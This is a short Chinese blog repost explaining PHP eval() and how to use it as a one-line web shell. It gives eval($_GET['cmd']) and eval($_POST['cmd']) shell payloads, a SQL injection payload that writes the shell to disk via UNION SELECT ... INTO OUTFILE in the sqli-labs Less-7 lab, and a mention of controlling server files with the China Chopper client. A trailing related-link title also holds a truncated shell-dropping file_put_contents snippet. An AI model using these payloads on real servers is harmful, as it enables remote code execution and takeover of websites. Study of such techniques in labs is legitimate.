PHP 一句话木马
Posted twx521
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了PHP 一句话木马相关的知识,希望对你有一定的参考价值。
eval 函数
eval() 函数把字符串按照 php 代码来计算
该字符串必须是合法的 PHP 代码,且必须以分号结尾
如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false
eval 函数的一般用法
eval() 函数用于简单的文本合并
<?php $string=‘cup‘; $name=‘coffee‘; $str=‘This is a $string with my $name in it.‘; echo $str." "; eval("$str="$str";"); echo $str." "; ?>
以上例程会输出
eval() 函数的特殊用法
用于构造一句话木马
eval($_GET["cmd"]);
两种方式
通过数据库写马
环境:sql_labs Less-7
写入一句话木马
union select 1,2,‘<?php eval($_POST["cmd"]);?>‘ into outfile ‘d:/wampserver/wamp64/www/sqli/sqli/Less-7/twx.txt‘%23
使用中国菜刀进行连接
可以访问并操作服务器文件
通过PHP 文件写马
<?php eval($_GET["cmd"]); ?>
访问PHP 文件,查看phpinfo()
以上是关于PHP 一句话木马的主要内容,如果未能解决你的问题,请参考以下文章
网站中了一句话木马<?php file_put_contents('laobiao.php','<?php $FucKSafedogX=base64_decode